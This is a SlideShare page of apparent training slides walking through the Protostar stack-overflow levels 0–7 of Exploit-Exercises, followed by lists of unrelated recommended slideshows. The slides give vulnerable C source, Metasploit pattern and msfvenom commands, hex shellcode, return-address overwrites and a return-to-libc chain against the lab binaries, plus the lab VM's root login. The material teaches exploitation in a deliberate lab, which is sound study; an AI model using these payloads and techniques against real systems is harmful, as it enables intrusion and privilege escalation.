SlideShare ist ein Scribd-Unternehmen logo

Stack Overflows Explained

Als PPTX, PDF herunterladen
C
commiebstrd

The buffer overflow vulnerability in Level 6 can be exploited by overwriting the return address on the stack to redirect execution flow. The return address can be overwritten with a format string pointing to shellcode stored elsewhere in memory. The shellcode executes to provide a shell, avoiding detection methods in the binary. Precise offsets must be determined through pattern creation and debugging to successfully exploit the vulnerability.

Technologie
1 von 41
Exploit-Exercises.com Stack Overflows Spenser Reinhardt
What Is A Buffer Overflow? A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.
Tools In Use Perl – Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly GDB – GNU Debugger, allows debugging of applications, inspecting of live variables, memory, and registers. Crash dumps know as core files can also be analyzed in the same manors. Metasploit Console: In ../msf/tools Pattern_Create.rb – Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are such as EIP or variables Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom – Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.
Preparing Protostar In virtual console window Login User: root Pass: godmode Get an IP dhclient & ifconfig | grep “inet addr”
Preparing Protostar Cont. Login ssh user@[IP] Pass: user Unlimit core dumps ulimit -c unlimited ulimit -a | grep core Change to bash shell /bin/bash Change to binary dir cd /opt/protostar/bin/
Level 0 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variablen"); } else { printf("Try again?n"); } }
Level 0 (Diagram) The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytes Uninitalized stack space
Level 0 (Solution) /opt/protostar/bin$ ./stack0 test Try again? /opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0 you have changed the 'modified' variable
Level 1 (source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argumentn"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen"); } else { printf("Try again, you got 0x%08xn", modified); } }
Level 1 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytes Uninitalized stack space
Level 1 (Solution) ./stack1 test Try again, you got 0x00000000 ./stack1 $(perl -e 'print "a"x70') Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] ./stack1 [MSF Pattern] Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes ./stack1 $(perl -e 'print "a"x64 . "x64x63x62x61nr"') you have correctly got the variable to the right value
Level 2 (Source) int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variablen"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen"); } else { printf("Try again, you got 0x%08xn", modified); } }
Level 2 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variable Uninitalized stack space
Level 2 (Solution) ./stack2 stack2: please set the GREENIE environment variable export GREENIE=$(perl -e 'print "a"x80') ./stack2 Try again, you got 0x61616161 ./pattern_create.rb 70 [MSF Pattern] export GREENIE=[MSF locator string] ./stack2 Try again, you got 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes export GREENIE=$(perl -e 'print "a"x64 . "x0ax0dx0ax0dnr"') ./stack2 you have correctly modified the variable
Level 3 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 3 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int fp = 0 Must point to win() Win() = 0x08048424 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } fp = 0; Uninitalized gets(buffer); stack space if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 3 (Solution) ./stack3 Test perl -e 'print "a"x80' | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] ./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163 ./pattern_offset.rb 63413163 = 64 bytes objdump -d ./stack3 | grep win 08048424 <win> perl -e 'print "a"x64 . "x24x84x04x08nr"' | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
Level 4 (Source) void win() { printf("code flow successfully changedn"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
Level 4 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } Uninitalized fp = 0; stack space gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
Level 4 (Solution) ./stack4 Test perl -e 'print "a"x80' | ./stack4 Segmentation fault ./pattern_create.rb 70 [MSF Pattern] Gdb –quiet ./stack4 Run - [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () ./pattern_offset.rb 63413563 = 76 bytes objdump -d ./stack4 | grep win 080483f4 <win> perl -e 'print "a"x76 . "xf4x83x04x08"' | ./stack4 code flow successfully changed Segmentation fault
Level 5 (Source) int main(int argc, char **argv) { char buffer[64]; gets(buffer); }
Level 5 The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Overwritten with nop sled and Shellcode. Current EIP – must be overwritten to point to our shellcode EIP = 0x08048424 Char buffer = 76 bytes int main(int argc, char **argv) { Uninitalized stack space char buffer[64]; gets(buffer); }
Level 5 (Solution 1) perl -e 'print "a"x80' | ./stack5 Segmentation fault ./pattern_create.rb 80 [MSF Pattern] Gdb –-quiet ./stack5 run [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) x $esp 0xbffff7c0 ./pattern_offset.rb 63413563 = 76 bytes Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
Level 5 (Solution 2) msfvenom -p linux/x86/exec -f pl -b 'x00xff' CMD=/bin/bash PrependSet resuid=true = ~70bytes perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9 xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xce xd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbc xe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08 x79x98x79x7bxfd"' | ./stack5 Result: Program exits cleanly without executing a shell. Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used. More Details: StackOverflow.com
Level 5 (Solution 3) msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 . "xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x 17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xf ax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx4 4xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx0 6x0bxb2x31"' | ./stack5 user@protostar:/opt/protostar/bin$ ls /tmp/ touch Local shell code for gets() - http://www.exploit-db.com/exploits/13357/
Level 6 (Source) void getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); } int main(int argc, char **argv { getpath(); }
Level 6 The Stack (Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytes Uninitalized stack space
Level 6 The Stack (Diagram 2) This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytes Uninitalized stack space
Level 6 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] Gdb –-quiet ./stack6 Run Input path please:[MSF Pattern] got path [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80 msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [SHELLCODE] ~ 80 bytes perl -e 'print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6 input path please: bzzzt (0xbffff7f0)
Level 6 (Solution 2) gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {<text variable, no debug info>} 0xb7eddf90 <__printf> (gdb) print execl $2 = {<text variable, no debug info>} 0xb7f2e460 <*__GI_execl> export FORMATSTRING=”%3$n” export SHELLCODE=”/location/to/shellcodefile” ~/getenvaddr FORMATSTRING ./stack6 FORMATSTRING will be at 0xbffff9a7 ~/getenvaddr SHELLCODE ./stack6 SHELLCODE will be at 0xbffff9b6
Level 6 (Solution 3) (Using altered stack6 binary) ~/stackx input path please: a 0xbffff75c got path a gdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp … 0xbffff966: "/home/user/stackx" … 0xbfffffea: "/home/user/stackx"
Level 6 (Solution 4) /home/user/stackx = 17 bytes /opt/protostar/bin/stack6 = 25 bytes Difference of = 8 bytes Shows twice in mem = 16 bytes total 80 x “a” = 80 bytes 20 for other addresses = 20 bytes Starting point of = 0xbffff75c perl -e 'printf("0x%08xn", 0xbffff75c + 20 + 80 + 16)' 0Xbffff7d0
Level 6 (Solution 5) Printf = 0xB7EDDF90 Execl = 0xB7F2E460 $FORMATSTRING = 0xBFFFF9A8 $SHELLCODE = 0xBFFFF9B6 End of buffer (here) = 0XBFFFF7D0 BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE | here perl -e 'print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" . "xb6xf9xffxbf"x2 . "xd0xf7xffxbf"' | ./stack6 Seg fault
Level 7 (Source) char *getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000{ printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); return strdup(buffer); } int main(int argc, char **argv){ getpath(); }
Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytes Uninitalized stack space
Level 7 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] gdb –-quiet ./stack7 input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80
Level 7 (Solution 2) scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7 msfelfscan -j edx ~/stack7 [~/stack7] msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret
Level 7 (Solution 3) perl -e 'print "a"x80 . "x92x84x04x08" . "c"x100' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? () ./pattern_create.rb 50 [MSF Pattern] perl -e 'print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? ()
Level 7 (Solution 4) ./pattern_offset.rb 0x33614132 8 perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? () msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [MSF Shellcode] export SHELLCODE=`perl -e 'print “[MSF Shellcode]"'` ~/getenvaddr SHELLCODE ./stack7 SHELLCODE will be at 0xbffff960
Level 7 (Solution 4) perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf"' | ./stack7 input path please: got path aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a��aaaaaaaaaaaa��CCCCCCCC`��� ls /tmp/ touch
Questions? Thanks! Exploit-exercises.com – Virtual machine creators Mattandreko.com - Tutorials Hacking: The Art of Exploitation – Jon Erickson

Empfohlen

Native interfaces for R
Native interfaces for RNative interfaces for R
Native interfaces for RSeth Falcon
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocationViji B
 
3 1. preprocessor, math, stdlib
3 1. preprocessor, math, stdlib3 1. preprocessor, math, stdlib
3 1. preprocessor, math, stdlib웅식 전
 
Virtual Separation of Concerns (2011 Update)
Virtual Separation of Concerns (2011 Update)Virtual Separation of Concerns (2011 Update)
Virtual Separation of Concerns (2011 Update)chk49
 
How to not write a boring test in Golang
How to not write a boring test in GolangHow to not write a boring test in Golang
How to not write a boring test in GolangDan Tran
 
D Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsD Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsMySQLConference
 
Oop 1
Oop 1Oop 1
Oop 1dreamhahaman
 
Bridge TensorFlow to run on Intel nGraph backends (v0.5)
Bridge TensorFlow to run on Intel nGraph backends (v0.5)Bridge TensorFlow to run on Intel nGraph backends (v0.5)
Bridge TensorFlow to run on Intel nGraph backends (v0.5)Mr. Vengineer
 

Empfohlen

Native interfaces for R
Native interfaces for RNative interfaces for R
Native interfaces for RSeth Falcon
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocationViji B
 
3 1. preprocessor, math, stdlib
3 1. preprocessor, math, stdlib3 1. preprocessor, math, stdlib
3 1. preprocessor, math, stdlib웅식 전
 
Virtual Separation of Concerns (2011 Update)
Virtual Separation of Concerns (2011 Update)Virtual Separation of Concerns (2011 Update)
Virtual Separation of Concerns (2011 Update)chk49
 
How to not write a boring test in Golang
How to not write a boring test in GolangHow to not write a boring test in Golang
How to not write a boring test in GolangDan Tran
 
D Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsD Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsMySQLConference
 
Oop 1
Oop 1Oop 1
Oop 1dreamhahaman
 
Bridge TensorFlow to run on Intel nGraph backends (v0.5)
Bridge TensorFlow to run on Intel nGraph backends (v0.5)Bridge TensorFlow to run on Intel nGraph backends (v0.5)
Bridge TensorFlow to run on Intel nGraph backends (v0.5)Mr. Vengineer
 
MeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone DetectorMeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone Detector영범 정
 
Beauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVMBeauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVMJarek Ratajski
 
Javascript Uncommon Programming
Javascript Uncommon ProgrammingJavascript Uncommon Programming
Javascript Uncommon Programmingjeffz
 
Коварный code type ITGM #9
Коварный code type ITGM #9Коварный code type ITGM #9
Коварный code type ITGM #9Andrey Zakharevich
 
The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)jeffz
 
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)changehee lee
 
Lecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handlingLecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handlingHariz Mustafa
 
What's New in C++ 11?
What's New in C++ 11?What's New in C++ 11?
What's New in C++ 11?Sasha Goldshtein
 
C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)Olve Maudal
 
Drizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The ServerDrizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The ServerPerconaPerformance
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуdelimitry
 
Apache PIG - User Defined Functions
Apache PIG - User Defined FunctionsApache PIG - User Defined Functions
Apache PIG - User Defined FunctionsChristoph Bauer
 
The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)jeffz
 
Eta
EtaEta
EtaJarek Ratajski
 
C++11 talk
C++11 talkC++11 talk
C++11 talkvpoliboyina
 
Python decorators (中文)
Python decorators (中文)Python decorators (中文)
Python decorators (中文)Yiwei Chen
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言Simen Li
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Mr. Vengineer
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacksn|u - The Open Security Community
 
StackOverflow
StackOverflowStackOverflow
StackOverflowSusam Pal
 

Weitere ähnliche Inhalte

Was ist angesagt?

MeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone DetectorMeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone Detector영범 정
 
Beauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVMBeauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVMJarek Ratajski
 
Javascript Uncommon Programming
Javascript Uncommon ProgrammingJavascript Uncommon Programming
Javascript Uncommon Programmingjeffz
 
Коварный code type ITGM #9
Коварный code type ITGM #9Коварный code type ITGM #9
Коварный code type ITGM #9Andrey Zakharevich
 
The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)jeffz
 
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)changehee lee
 
Lecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handlingLecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handlingHariz Mustafa
 
C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)Olve Maudal
 
Drizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The ServerDrizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The ServerPerconaPerformance
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуdelimitry
 
Apache PIG - User Defined Functions
Apache PIG - User Defined FunctionsApache PIG - User Defined Functions
Apache PIG - User Defined FunctionsChristoph Bauer
 
The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)jeffz
 
Python decorators (中文)
Python decorators (中文)Python decorators (中文)
Python decorators (中文)Yiwei Chen
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談hackstuff
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言Simen Li
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Mr. Vengineer
 

Was ist angesagt? (20)

MeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone DetectorMeCC: Memory Comparison-based Code Clone Detector
MeCC: Memory Comparison-based Code Clone Detector
 
Beauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVMBeauty and the beast - Haskell on JVM
Beauty and the beast - Haskell on JVM
 
Javascript Uncommon Programming
Javascript Uncommon ProgrammingJavascript Uncommon Programming
Javascript Uncommon Programming
 
Коварный code type ITGM #9
Коварный code type ITGM #9Коварный code type ITGM #9
Коварный code type ITGM #9
 
The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)The Evolution of Async-Programming (SD 2.0, JavaScript)
The Evolution of Async-Programming (SD 2.0, JavaScript)
 
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
개발 과정 최적화 하기 내부툴로 더욱 강력한 개발하기 Stephen kennedy _(11시40분_103호)
 
Lecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handlingLecture05 operator overloading-and_exception_handling
Lecture05 operator overloading-and_exception_handling
 
What's New in C++ 11?
What's New in C++ 11?What's New in C++ 11?
What's New in C++ 11?
 
C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)C++ idioms by example (Nov 2008)
C++ idioms by example (Nov 2008)
 
Drizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The ServerDrizzles Approach To Improving Performance Of The Server
Drizzles Approach To Improving Performance Of The Server
 
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему кодуITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
ITGM #9 - Коварный CodeType, или от segfault'а к работающему коду
 
Apache PIG - User Defined Functions
Apache PIG - User Defined FunctionsApache PIG - User Defined Functions
Apache PIG - User Defined Functions
 
The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)The Evolution of Async-Programming on .NET Platform (TUP, Full)
The Evolution of Async-Programming on .NET Platform (TUP, Full)
 
Eta
EtaEta
Eta
 
C++11 talk
C++11 talkC++11 talk
C++11 talk
 
Python decorators (中文)
Python decorators (中文)Python decorators (中文)
Python decorators (中文)
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflows
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
 
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)Bridge TensorFlow to run on Intel nGraph backends (v0.4)
Bridge TensorFlow to run on Intel nGraph backends (v0.4)
 

Ähnlich wie Stack Overflows Explained

StackOverflow
StackOverflowStackOverflow
StackOverflowSusam Pal
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]RootedCON
 
presentation_functions_1443207686_140676.ppt
presentation_functions_1443207686_140676.pptpresentation_functions_1443207686_140676.ppt
presentation_functions_1443207686_140676.pptSandipPradhan23
 
TLPI - 6 Process
TLPI - 6 ProcessTLPI - 6 Process
TLPI - 6 ProcessShu-Yu Fu
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer OverflowsSumit Kumar
 
Format String Vulnerability
Format String VulnerabilityFormat String Vulnerability
Format String VulnerabilityJian-Yu Li
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROPJapneet Singh
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321Teddy Hsiung
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADDharmalingam Ganesan
 
Exploiting Memory Overflows
Exploiting Memory OverflowsExploiting Memory Overflows
Exploiting Memory OverflowsAnkur Tyagi
 
Unit 4
Unit 4Unit 4
Unit 4siddr
 
PHPConPl 2013 - Allowed memory size of X bytes exhausted
PHPConPl 2013 - Allowed memory size of X bytes exhaustedPHPConPl 2013 - Allowed memory size of X bytes exhausted
PHPConPl 2013 - Allowed memory size of X bytes exhaustedPiotr Pasich
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxSam Bowne
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Kernel TLV
 

Ähnlich wie Stack Overflows Explained (20)

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
StackOverflow
StackOverflowStackOverflow
StackOverflow
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
 
presentation_functions_1443207686_140676.ppt
presentation_functions_1443207686_140676.pptpresentation_functions_1443207686_140676.ppt
presentation_functions_1443207686_140676.ppt
 
TLPI - 6 Process
TLPI - 6 ProcessTLPI - 6 Process
TLPI - 6 Process
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
 
Buffer OverFlow
Buffer OverFlowBuffer OverFlow
Buffer OverFlow
 
Format String Vulnerability
Format String VulnerabilityFormat String Vulnerability
Format String Vulnerability
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOAD
 
V8
V8V8
V8
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
Exploiting Memory Overflows
Exploiting Memory OverflowsExploiting Memory Overflows
Exploiting Memory Overflows
 
Unit 4
Unit 4Unit 4
Unit 4
 
